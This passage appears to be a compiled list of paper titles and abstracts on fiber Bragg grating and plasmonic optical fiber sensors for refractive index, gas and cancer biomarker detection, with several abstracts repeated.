proposed in this paper. Pd/Ag composite films were deposited on the side-face of etched fiber Bragg grating (FBG) as sensing elements by magnetron sputtering process. The atomic ratio of the two metals in Pd/Ag composite film is controlled at Pd:Ag = 76:24. Compared to standard FBG coated with same hydrogen sensitive film, etched FBG can significantly increase the sensor’s sensitivity. When hydrogen concentrations are 4% in volume percentage, the wavelength shifts of FBG-125 μm, FBG-38 μm and FBG-20.6 μm are 8, 23 and 40 pm respectively. The experimental results show the sensor’s hydrogen response is reversible, and the hydrogen sensor has great potential in hydrogen’s measurement. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Optical bio-sensing devices based on etched fiber Bragg gratings coated with carbon nanotubes and graphene oxide along with a specific dendrimer paper_content: We demonstrate that etched fiber Bragg gratings (eFBGs) coated with single walled carbon nanotubes (SWNTs) and graphene oxide (GO) are highly sensitive and accurate biochemical sensors. Here, for detecting protein concanavalin A (Con A), mannose-functionalized poly(propyl ether imine) (PETIM) dendrimers (DMs) have been attached to the SWNTs (or GO) coated on the surface modified eFBG. The dendrimers act as multivalent ligands, having specificity to detect lectin Con A. The specificity of the sensor is shown by a much weaker response (factor of similar to 2500 for the SWNT and similar to 2000 for the GO coated eFBG) to detect non specific lectin peanut agglutinin. DM molecules functionalized GO coated eFBG sensors showed excellent specificity to Con A even in the presence of excess amount of an interfering protein bovine serum albumin. The shift in the Bragg wavelength (Delta lambda(B)) with respect to the lambda(B) values of SWNT (or GO)-DM coated eFBG for various concentrations of lectin follows Langmuir type adsorption isotherm, giving an affinity constant of similar to 4 x 10(7) M-1 for SWNTs coated eFBG and similar to 3 x 10(8) M-1 for the GO coated eFBG. (C) 2014 Elsevier B.V. All rights reserved. --- paper_title: [INVITED] Tilted fiber grating mechanical and biochemical sensors ☆ paper_content: The tilted fiber Bragg grating (TFBG) is a new kind of fiber-optic sensor that possesses all the advantages of well-established Bragg grating technology in addition to being able to excite cladding modes resonantly. This device opens up a multitude of opportunities for single-point sensing in hard-to-reach spaces with very controllable cross-sensitivities, absolute and relative measurements of various parameters, and an extreme sensitivity to materials external to the fiber without requiring the fiber to be etched or tapered. Over the past five years, our research group has been developing multimodal fiber-optic sensors based on TFBG in various shapes and forms, always keeping the device itself simple to fabricate and compatible with low-cost manufacturing. This paper presents a brief review of the principle, fabrication, characterization, and implementation of TFBGs, followed by our progress in TFBG sensors for mechanical and biochemical applications, including one-dimensional TFBG vibroscopes, accelerometers and micro-displacement sensors; two-dimensional TFBG vector vibroscopes and vector rotation sensors; reflective TFBG refractometers with in-fiber and fiber-to-fiber configurations; polarimetric and plasmonic TFBG biochemical sensors for in-situ detection of cell, protein and glucose. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. --- paper_title: Sensitivity-enhanced FBG demodulation system with multi-sideband filtering method paper_content: Abstract A multi-sideband filtering demodulation scheme with enhanced high sensitivity was proposed to demodulate weak fiber Bragg grating signals, and a novel data processing method was employed to reduce the influence of the background noise. The relationship of the sensing sensitivity, number of sidebands, and their slope coefficients were researched theoretically, numerically, and experimentally. The results showed that the sensing sensitivity was in proportion to the number of the sidebands and their slope coefficients. The power sensitivities for single and double CWDMs demodulating FBG in the experimental system were 6.960 dB/nm and 15.187 dB/nm, respectively, which were in agreement with the theoretical results. In addition, the data processing method we used to obtain the optical power was experimentally proven to be better than the method of directly measuring the optical power because it reduces the background noise. --- paper_title: Power-referenced refractometer with tilted fiber Bragg grating cascaded by chirped grating paper_content: Abstract A power-referenced refractometer operating in reflection mode is proposed and experimentally demonstrated based on a tilted-fiber Bragg grating (TFBG) cascaded by a reflection-band-matched chirped-fiber Bragg grating (CFBG). The optical signal reflected by the CFBG passes twice through the TFBG that enhances sensitivity of the refractometer. In addition, the optical signal is propagating all the way in the fiber core so that the extra insertion loss is low. Refractive index measurement with sensitivity up to 597.2 μW/R.I.U. is achieved within the range from 1.333 to ~1.42. The maximum detectable refractive index is ~1.45. --- paper_title: Plasmonic Fiber-Optic Refractometers Based on a High Q-Factor Amplitude Interrogation paper_content: A nano-scale gold-coated tilted fiber Bragg grating sensor with clear surface plasmon resonance is proposed and experimentally demonstrated. The transmission spectrum of the sensor provides a fine comb of narrowband resonances that overlap with the broader absorption of the surface plasmon and thus provides a unique tool to measure small shifts of the plasmon and identify the changes of the surrounding refractive index (SRI) with high accuracy. Meanwhile, our proposed sensor provides an amplitude interrogation method for SRI measurement, which is much simpler and cost-effective than the traditional wavelength monitoring. Experimental results obtained in sucrose solutions with different refractive indices ranging from 1.3330 to 1.3410 show that the sensitivities of our proposed sensor are 450 nm/RIU and 2040 dB/RIU by using the wavelength and amplitude interrogation methods, respectively. Furthermore, the Q-factor of amplitude interrogation signal has been increased from $\sim 70$ to $\sim 6000$ by using the narrowband cladding resonance instead of broader SPR absorption. --- paper_title: Narrowband interrogation of plasmonic optical fiber biosensors based on spectral combs paper_content: Abstract Gold-coated tilted fiber Bragg gratings can probe surface Plasmon polaritons with high resolution and sensitivity. In this work, we report two configurations to interrogate such plasmonic biosensors, with the aim of providing more efficient alternatives to the widespread spectrometer-based techniques. To this aim, the interrogation is based on measuring the optical power evolution of the cladding modes with respect to surrounding refractive index changes instead of computing their wavelength shift. Both setups are composed of a broadband source and a photodiode and enable a narrowband interrogation around the cladding mode that excites the surface Plasmon resonance. The first configuration makes use of a uniform fiber Bragg grating to filter the broadband response of the source in a way that the final interrogation is based on an intensity modulation measured in transmission. The second setup uses a uniform fiber grating too, but located beyond the sensor and acting as a selective optical mirror, so the interrogation is carried out in reflection. Both configurations are compared, showing interesting differential features. The first one exhibits a very high sensitivity while the second one has an almost temperature-insensitive behavior. Hence, the choice of the most appropriate method will be driven by the requirements of the target application. --- paper_title: Multiplexing of Surface Plasmon Resonance Sensing Devices on Etched Single-Mode Fiber paper_content: It is proposed the multiplexing of optical fiber-based surface plasmon resonance (SPR) sensors deployed in a ladder topology, addressed in wavelength by combining each sensor with specific fiber Bragg gratings (FBGs) and considering intensity interrogation. In each branch of the fiber layout, the FBGs are located after the sensor and the peak optical power reflected by the FBGs is a function of the relative spectral position between the SPR sensor and the FBG resonances, with the former dependent on the refractive index of the surrounding medium. The concept is tested for the multiplexing of two SPR sensors fabricated in an etched region of a single-mode fiber showing intrinsic refractive index sensitivity up to 5000 nm/RIU, which translates into a sensitivity of ∼829 dB/RIU from the interrogation approach considered. The obtained refractive index resolution is in the order of 10−4 RIU, and the crosstalk level between the sensors was found negligible. --- paper_title: Fibre optic surface plasmon resonance sensor system designed for smartphones paper_content: A fibre optic surface plasmon resonance (SPR) sensor system for smartphones is reported, for the first time. The sensor was fabricated by using an easy-to-implement silver coating technique and by polishing both ends of a 400 µm optical fibre to obtain 45° end-faces. For excitation and interrogation of the SPR sensor system the flash-light and camera at the back side of the smartphone were employed, respectively. Consequently, no external electrical components are required for the operation of the sensor system developed. In a first application example a refractive index sensor was realised. The performance of the SPR sensor system was demonstrated by using different volume concentrations of glycerol solution. A sensitivity of 5.96·10−4 refractive index units (RIU)/pixel was obtained for a refractive index (RI) range from 1.33 to 1.36. In future implementations the reported sensor system could be integrated in a cover of a smartphone or used as a low-cost, portable point-of-care diagnostic platform. Consequently it offers the potential of monitoring a large variety of environmental or point-of-care parameters in combination with smartphones. --- paper_title: Surface Plasmon Resonances in Oriented Silver Nanowire Coatings on Optical Fibers paper_content: Silver nanowires 1–3 μm in length and diameters of 0.04–0.05 μm were synthesized by a polyol process and deposited on a single mode optical fiber with the Langmuir–Blodgett technique. For nanowire surface coverage of ∼40% and partial orientation of their long axis obtained by controlling the deposition parameters, the optical properties of the nanowire coating become identical to those of a uniform metal coating obtained by sputtering or evaporation. Excitation of the nanowires by the polarized evanescent field of fiber cladding modes at near-infrared wavelengths near 1.5 μm results in surface plasmon-like resonances in the transmission spectrum of the optical fiber. The polarization-dependent loss (PDL) spectrum of the tilted fiber Bragg grating used to excite the cladding modes shows a pronounced characteristic dip indicative of a plasmon resonance for radially polarized light waves and complete shielding of light for azimuthally polarized light. The PDL dip shifts at a rate of 650 nm/(refractive index ... --- paper_title: Analysis of a plasmonic based optical fiber optrode with phase interrogation paper_content: Optical fiber optrodes are attractive sensing devices due to their ability to perform point measurement in remote locations. Mostly, they are oriented to biochemical sensing, quite often supported by fluorescent and spectroscopic techniques, but with the refractometric approach considered as well when the objective is of high measurement performance, particularly when the focus is on enhancing the measurand resolution. In this work, we address this subject, proposing and analyzing the characteristics of a fiber optic optrode relying on plasmonic interaction. A linearly tapered optical fiber tip is covered by a double overlay: the inner one–a silver thin film and over it–a dielectric layer, with this combination allowing to achieve, at a specific wavelength range, surface plasmonic resonance (SPR) interaction sensitive to the refractive index of the surrounding medium. Typically, the interrogation of the SPR sensing structures is performed, considering spectroscopic techniques, but in principle, a far better performance can be obtained, considering the reading of the phase of the light at a specific wavelength located within the spectral plasmonic resonance. This is the approach which is studied here in the context of the proposed optical fiber optrode configuration. The analysis performed shows the combination of a silver inner layer with a dielectric titanium oxide layer with tuned thicknesses enables sensitive phase reading and allows the operation of the fiber optic optrode sensor in the third telecommunication wavelength window. --- paper_title: KLT-Based Interrogation Technique for FBG Multiplexed Sensor Tracking paper_content: The Karhunen–Loeve transform (KLT) is used to retrieve the wavelength information of several fiber Bragg gratings (FBGs) that are acting as a multiplexed sensor. The modulated light of a broadband source is launched to the FBG cascade in order to capture the electrical frequency response of the system. Thanks to dispersive media, the wavelengths of the FBGs are mapped in radio-frequency delays. Wavelength changes are determined by the amplitude change of the samples in the impulse response, a change which is followed by the eigenvalue calculated by the KLT routine. The use of the KLT routine reduces by three orders of magnitude the amount of points needed to have a subdegree resolution in temperature sensing, while keeping the accuracy almost intact. --- paper_title: Self-optimized metal coatings for fiber plasmonics by electroless deposition paper_content: We present a novel method to prepare optimized metal coatings for infrared Surface Plasmon Resonance (SPR) sensors by electroless plating. We show that Tilted Fiber Bragg grating sensors can be used to monitor in real-time the growth of gold nano-films up to 70 nm in thickness and to stop the deposition of the gold at a thickness that maximizes the SPR (near 55 nm for sensors operating in the near infrared at wavelengths around 1550 nm). The deposited films are highly uniform around the fiber circumference and in spite of some nanoscale roughness (RMS surface roughness of 5.17 nm) the underlying gratings show high quality SPR responses in water. --- paper_title: Theoretical and experimental study of differential group delay and polarization dependent loss of Bragg gratings written in birefringent fiber paper_content: In this paper, we completely study the wavelength dependency of differential group delay (DGD) and polarization dependent loss (PDL) for Bragg gratings written in birefringent fibers. Based on the coupled mode theory, we present analytical expressions for the evolution with wavelength of the transmission coefficient, the DGD and the PDL. The wavelength dependencies of these evolutions on the birefringence are then discussed. Experimental results are finally presented for an apodized FBG written in a bow-tie fiber. A very good agreement between theory and experience is reported, confirming the validity of the theoretical analysis. --- paper_title: Polarization-Assisted Fiber Bragg Grating Sensors: Tutorial and Review paper_content: Fiber Bragg gratings (FBGs) are inherently sensitive to temperature, axial strain, and pressure, which can be easily measured by a shift of the Bragg wavelength in their reflected/transmitted power spectrum. FBG sensors acquire many more additional sensing modalities and applications when the polarization of the interrogating light is controlled. For the polarization to have an effect, the cylindrical symmetry of the fiber must be broken, either by the structure of the fiber itself, by that of the FBG, or by the perturbation to be measured. Polarization control allows for sensing parameters that are spatially oriented, such as lateral force, bending or twist, and also for measurements of the properties of anisotropic media. Most importantly, polarization control enables high quality all-fiber surface plasmon resonance (SPR) FBG sensors and localized SPR-assisted sensing. This tutorial will cover the theory of polarized measurements in fiber gratings, their experimental implementation, and review a selection of the most important applications. --- paper_title: High resolution interrogation of tilted fiber grating SPR sensors from polarization properties measurement. paper_content: The generation of surface plasmon resonances (SPRs) in gold-coated weakly tilted fiber Bragg gratings (TFBGs) strongly depends on the state of polarization of the core guided light. Recently, it was demonstrated that rotating the linear state of polarization of the guided light by 90° with respect to the grating tilt allows to turn the SPR on and off. In this work, we measure the Jones matrix associated to the TFBG transmission properties in order to be able to analyze different polarization-related parameters (i.e. dependency on wavelength of polarization dependent loss and first Stokes parameter). As they contain the information about the SPR, they can be used as a robust and accurate demodulation technique for refractometry purposes. Unlike other methods reported so far, a tight control of the input state of polarization is not required. The maximum error on refractive index measurement has been determined to be ~1 10(-5) refractive index unit (RIU), 5 times better than intensity-based measurements on the same sensors. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. --- paper_title: Evanescent wave long-period fiber bragg grating as an immobilized antibody biosensor paper_content: An immunosensor using a long-period grating (LPG) was used for sensitive detection of antibody−antigen reactions. Goat anti-human IgG (antibody) was immobilized on the surface of the LPG, and detection of specific antibody−antigen binding was investigated. This sensor operates using total internal reflection where an evanescent field interacts with bound antibody immobilized over the grating region. The reaction between antibody and antigen altered the LPG transmission spectrum and was monitored in real time as a change in refractive index, thereby eliminating the need for labeling antigen molecules. Human IgG binding was observed to be concentration dependent over a range of 2−100 μg mL-1, and equilibrium bound antigen levels could be attained in ∼5 min using an initial rate determination. Binding specificity was confirmed using human interleukin-2 and bovine serum albumin as controls, and nonspecific adsorption of proteins did not significantly interfere with detection of binding. Antigen detection in a... --- paper_title: Detecting hybridization of DNA by highly sensitive evanescent field etched core fiber Bragg grating sensors paper_content: Highly sensitive fiber Bragg grating sensors were developed by etching away the cladding and part of the core of the fiber and detecting the change of Bragg wavelength due to the change of index of the surrounding medium. A sensitivity of 1394 nm/riu was achieved when the diameter of the grating core was 3.4 /spl mu/m and the index of the surrounding medium was close to the index of the core of the fiber. Assuming a detectable spectral resolution of 0.01 nm realized in the experiment, the sensor achieves a minimum detectable index resolution of 7.2/spl times/10/sup -6/. Higher sensitivity at lower surrounding index was achieved by using higher order modes excited in the Bragg grating region. The use of the fiber Bragg grating sensor was further investigated to detect hybridization of DNA. Single stranded DNA oligonucleotide probes of 20 bases were immobilized on the surface of the fiber grating using relatively common glutarahyldehyde chemistry. Hybridization of complimentary target single strand DNA oligonucleotide was monitored in situ and successfully detected. The demonstrated fiber Bragg grating sensors provide an elegant method to monitor biological changes in an in situ manner, and provide temporal information in a single experiment. --- paper_title: Giant sensitivity of long period gratings in transition mode near the dispersion turning point: an integrated design approach paper_content: We report an original design approach based on the modal dispersion curves for the development of long period gratings in transition mode near the dispersion turning point exhibiting ultrahigh refractive index sensitivity. The theoretical model predicting a giant sensitivity of 9900 nm per refractive index unit in a watery environment was experimentally validated with a result of approximately 9100 nm per refractive index unit around an ambient index of 1.3469. This result places thin film coated LPGs as an alternative to other fiber-based technologies for high-performance chemical and biological sensing applications. --- paper_title: Sensitive optical biosensors for unlabeled targets: A review paper_content: This article reviews the recent progress in optical biosensors that use the label-free detection protocol, in which biomolecules are unlabeled or unmodified, and are detected in their natural forms. In particular, it will focus on the optical biosensors that utilize the refractive index change as the sensing transduction signal. Various optical label-free biosensing platforms will be introduced, including, but not limited to, surface plasmon resonance, interferometers, waveguides, fiber gratings, ring resonators, and photonic crystals. Emphasis will be given to the description of optical structures and their respective sensing mechanisms. Examples of detecting various types of biomolecules will be presented. Wherever possible, the sensing performance of each optical structure will be evaluated and compared in terms of sensitivity and detection limit. --- paper_title: Manufacturing and Spectral Features of Different Types of Long Period Fiber Gratings: Phase-Shifted, Turn-Around Point, Internally Tilted, and Pseudo-Random paper_content: The manufacturing and spectral features of different types of long period fiber gratings (LPFGs), ranging from phase-shifted, turn-around point, and internally tilted gratings, to pseudo-random gratings, are described and discussed in detail. LPFGs were manufactured on boron-germanium co-doped photosensitive optical fibers with the point-by-point technique using an excimer KrF laser operating at 248 nm. The developed experimental setup to manufacture high-quality LPFGs was designed to totally customize any type of gratings with the possibility of setting different parameters, such as the grating period (or pitch), the number of grating planes, the number of laser shots for each plane, etc. Some important spectral features of the LPFGs’ spectra were taken into account. This allows realizing homemade devices useful in several fiber-based applications, such as optical filtering, coupling systems, random lasers, physical and chemical sensing, and biosensing. --- paper_title: Long period fiber grating nano-optrode for cancer biomarker detection paper_content: Abstract We report an innovative fiber optic nano-optrode based on Long Period Gratings (LPGs) working in reflection mode for the detection of human Thyroglobulin (TG), a protein marker of differentiated thyroid cancer. The reflection-type LPG (RT-LPG) biosensor, coated with a single layer of atactic polystyrene (aPS) onto which a specific, high affinity anti-Tg antibody was adsorbed, allowed the label-free detection of Tg in the needle washouts of fine-needle aspiration biopsies, at concentrations useful for pre- and post-operative assessment of the biomarker levels. Analyte recognition and capture were confirmed with a parallel on fiber ELISA-like assay using, in pilot tests, the biotinylated protein and HRP-labeled streptavidin for its detection. Dose-dependent experiments showed that the detection is linearly dependent on concentration within the range between 0 and 4 ng/mL, while antibody saturation occurs for higher protein levels. The system is characterized by a very high sensitivity and specificity allowing the ex-vivo detection of sub ng/ml concentrations of human Tg from needle washouts of fine-needle aspiration biopsies of thyroid nodule from different patients. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. --- paper_title: Fiber Bragg grating assisted surface plasmon resonance sensor with graphene oxide sensing layer paper_content: Abstract A single mode fiber Bragg grating (FBG) is used to generate Surface Plasmon Resonance (SPR). The uniform gratings of the FBG are used to scatter light from the fiber optic core into the cladding thus enabling the interaction between the light and a thin gold film in order to generate SPR. Applying this technique, the cladding around the FBG is left intact, making this sensor very robust and easy to handle. A thin film of graphene oxide (GO) is deposited over a 45 nm gold film to enhance the sensitivity of the SPR sensor. The gold coated sensor demonstrated high sensitivity of approximately 200 nm/RIU when tested with different concentrations of ethanol in an aqueous medium. A 2.5 times improvement in sensitivity is observed with the GO enhancement compared to the gold coated sensor. --- paper_title: Graphene-controlled fiber Bragg grating and enabled optical bistability. paper_content: We report a graphene-assisted all-optical control of a fiber Bragg grating (FBG), which enables in-fiber optical bistability and switching. With an optical pump, a micro-FBG wrapped by graphene evolves into chirped and phase-shifted FBGs, whose characteristic wavelengths and bandwidths could be controlled by the pump power. Optical bistability and multistability are achieved in the controlled FBG based on a shifted Bragg reflection or Fabry–Perot-type resonance, which allow the implementation of optical switching with an extinction ratio exceeding 20 dB and a response time in tens of milliseconds. --- paper_title: Femtosecond Laser Inscribed Bragg Gratings in Low Loss CYTOP Polymer Optical Fiber paper_content: We report on the first inscription of fiber Bragg gratings (FBGs) in cyclic transparent optical polymer (CYTOP)-perfluorinated polymer optical fibers (POFs). We have used a direct write method with a femtosecond laser operating in the visible. The FBGs have a typical reflectivity of 70%, a bandwidth of 0.25 nm, a 3-mm length, and an index change of $\sim 10^{-4}$ . The FBGs operate in the $C$ -band, where CYTOP offers key advantages over polymethyl methacrylate optical fibers, displaying significantly lower optical loss in the important near-infrared (NIR) optical communications window. In addition, we note that CYTOP has a far lower affinity for water absorption and a core-mode refractive index that coincides with the aqueous index regime. These properties offer several unique opportunities for POF sensing at NIR wavelengths, such as compatibility with existing optical networks, the potential for POF sensor multiplexing and suitability for biosensing. We demonstrate compatibility with a commercial Bragg grating demodulator. --- paper_title: Challenges in the fabrication of fibre Bragg gratings in silica and polymer microstructured optical fibres paper_content: This paper reviews the state-of-the-art of grating fabrication in silica and polymer microstructured optical fibres. It focuses on the difficulties and challenges encountered during photo-inscription of such gratings and more specifically on the effect of the air hole lattice microstructure in the cladding of the fibre on the transverse coupling of the coherent writing light to the core region of the fibre. Experimental and computational quantities introduced thus far to assess the influence of the photonic crystal lattice on grating writing efficiency are reviewed as well, together with techniques that have been proposed to mitigate this influence. Finally, early proposals to adapt the microstructure in view of possibly enhancing multi-photon grating fabrication efficiency are discussed. --- paper_title: Graphene-coated microfiber Bragg grating for high-sensitivity gas sensing. paper_content: A graphene coated microfiber Bragg grating (GMFBG) for gas sensing is reported in this Letter. Taking advantage of the surface field enhancement and gas absorption of a GMFBG, we demonstrate an ultrasensitive approach to detect the concentration of chemical gas. The obtained sensitivities are 0.2 and 0.5 ppm for NH3 and xylene gas, respectively, which are tens of times higher than that of a GMFBG without graphene for tiny gas concentration change detection. Experimental results indicate that the GMFBG-based NH3 gas sensor has fast response due to its highly compact structure. Such a miniature fiber-optic element may find applications in high sensitivity gas sensing and trace analysis. --- paper_title: Surface plasmon excitation at near-infrared wavelengths in polymer optical fibers. paper_content: We report the first excitation of surface plasmon waves at near-infrared telecommunication wavelengths using polymer optical fibers (POFs) made of poly(methyl methacrylate) (PMMA). For this, weakly tilted fiber-Bragg gratings (TFBGs) have been photo-inscribed in the core of step-index POFs and the fiber coated with a thin gold layer. Surface plasmon resonance is excited with radially polarized modes and is spectrally observed as a singular extinction of some cladding-mode resonances in the transmitted amplitude spectrum of gold-coated TFBGs. The refractometric sensitivity can reach ∼550 nm/RIU 